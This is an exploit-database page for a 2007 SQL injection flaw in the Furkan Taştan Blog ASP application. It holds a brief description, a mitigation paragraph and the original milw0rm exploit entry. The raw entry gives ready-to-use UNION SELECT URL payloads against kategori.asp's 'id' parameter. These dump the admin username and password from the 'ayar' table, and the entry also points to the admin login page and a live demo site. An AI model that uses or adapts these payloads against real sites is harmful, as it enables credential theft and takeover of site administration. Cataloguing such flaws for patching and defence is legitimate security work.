header-logo
Suggest Exploit
vendor:
by:
CyberGhost
7.5
CVSS
HIGH
Remote SQL Injection
89
CWE
Product Name:
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Furkan TaÅŸtan Blog Remote SQL Injection Vulnerability

The vulnerability allows an attacker to perform SQL injection attacks on the Furkan TaÅŸtan Blog website. By manipulating the 'id' parameter in the '/kategori.asp?kat=goster&id=' URL, an attacker can execute arbitrary SQL queries and retrieve sensitive information from the database.

Mitigation:

To mitigate this vulnerability, the website should implement proper input validation and parameterized queries to prevent SQL injection attacks. Regular security audits and updates should also be performed.
Source

Exploit-DB raw data:

#Title  : Furkan TaÅŸtan Blog Remote SQL Injection Vulnerability
#Author : CyberGhost
#Demo Page   : http://furkantastan.somee.com/blog
#Script Download Page: : http://www.aspindir.com/indir.asp?ID=5152

#Vuln.

#Username : /kategori.asp?kat=goster&id=-1+union+select+0,1,adkull,3,4,5,6,7,8+from+ayar
#Password : /kategori.asp?kat=goster&id=-1+union+select+0,1,adsif,3,4,5,6,7,8+from+ayar

#Admin Login : /admin/admin.asp

====================================

Saz Arkadaşlarım: Hackinger - KinSize - dumenci - Kerem125 - Gsy - F10

And All TURKISH HACKERS !

# milw0rm.com [2007-10-05]

Navigation

Suggest Exploit

Services By CQR